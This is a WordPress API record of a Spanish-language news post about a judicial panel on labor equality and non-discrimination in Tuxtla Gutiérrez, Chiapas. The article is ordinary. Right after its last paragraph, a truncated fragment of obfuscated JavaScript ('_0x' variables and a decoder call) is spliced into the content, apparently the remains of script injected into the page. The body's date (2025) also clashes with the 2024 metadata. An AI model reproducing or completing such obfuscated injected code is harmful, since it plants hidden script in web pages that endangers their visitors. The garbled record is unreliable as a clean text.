{"id":18799,"date":"2024-11-09T04:25:51","date_gmt":"2024-11-09T04:25:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18799"},"modified":"2024-11-09T04:27:41","modified_gmt":"2024-11-09T04:27:41","slug":"realiza-poder-judicial-panel-dialogos-sobre-la-politica-de-igualdad-laboral","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18799","title":{"rendered":"Realiza Poder Judicial panel Di\u00e1logos sobre la Pol\u00edtica de Igualdad Laboral"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/WhatsApp-Image-2024-11-06-at-1.25.40-PM-4-1024x576.jpeg\" alt=\"\" class=\"wp-image-18800\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/WhatsApp-Image-2024-11-06-at-1.25.40-PM-4-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/WhatsApp-Image-2024-11-06-at-1.25.40-PM-4-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/WhatsApp-Image-2024-11-06-at-1.25.40-PM-4-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/WhatsApp-Image-2024-11-06-at-1.25.40-PM-4-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/WhatsApp-Image-2024-11-06-at-1.25.40-PM-4.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>08 noviembre del 2025<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, a trav\u00e9s Comit\u00e9 de Igualdad Laboral y No Discriminaci\u00f3n, llev\u00f3 a cabo un panel titulado Di\u00e1logos sobre la Pol\u00edtica de Igualdad Laboral.<\/p>\n\n\n\n<p>Dicho panel, que estuvo dirigida al personal administrativo y jurisdiccional de esta sede judicial, se realiz\u00f3 con el prop\u00f3sito de fortalecer el compromiso con la igualdad laboral y promover pol\u00edticas que erradiquen la discriminaci\u00f3n en el \u00e1mbito judicial, promoviendo un entorno de trabajo inclusivo y equitativo.<\/p>\n\n\n\n<p>Desde el recinto del Auditorio Don Enrique Robles Dom\u00ednguez en el Palacio de Justicia de Tuxtla Guti\u00e9rrez, se cont\u00f3 con la participaci\u00f3n como panelistas de la directora general del Centro Estatal de Justicia Alternativa, Elisheba Goldhaber Pasillas; el director de la Unidad de Mejora Regulatoria, Francisco Eduardo Kanter Culebro; y la iinterante del Comit\u00e9 de Igualdad adscrita al Fondo Auxiliar para la Administraci\u00f3n de Justicia, Gema Guadalupe G\u00f3mez Morales; y moderando el evento, &nbsp;la coordinadora y secretaria t\u00e9cnica del Comit\u00e9 de Igualdad Laboral y No Discriminaci\u00f3n, Mar\u00eda Silinia Aguilar Avenda\u00f1o.<\/p>\n\n\n\n<p>Con este ejercicio, el Poder Judicial del Estado se compromete a promover la sensibilizaci\u00f3n en el \u00e1mbito judicial sobre la importancia de implementar pol\u00edticas laborales que aseguren la igualdad de oportunidades y el respeto a los derechos de todas y todos sus trabajadores, a la vez que se trabaja a la vanguardia, en concordancia con lo que establecen los instrumentos internacionales y las recientes reformas constitucionales propuestas por la Presidenta de la Rep\u00fablica, Claudia Sheinbaum, en Igualdad Sustantiva para todas las mujeres en los \u00e1mbitos social, jur\u00eddico, econ\u00f3mico y cultural.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>08 noviembre del 2025 Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas que encabeza el magistrado presidente Guillermo Ramos P\u00e9rez, a trav\u00e9s Comit\u00e9 de Igualdad Laboral y No Discriminaci\u00f3n, llev\u00f3 a cabo un panel titulado Di\u00e1logos sobre la Pol\u00edtica de Igualdad Laboral. Dicho panel, que estuvo dirigida al personal administrativo y jurisdiccional de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18800,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,6],"tags":[],"class_list":["post-18799","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-minuto","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18799","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18799"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18799\/revisions"}],"predecessor-version":[{"id":18801,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18799\/revisions\/18801"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18800"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18799"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18799"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18799"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}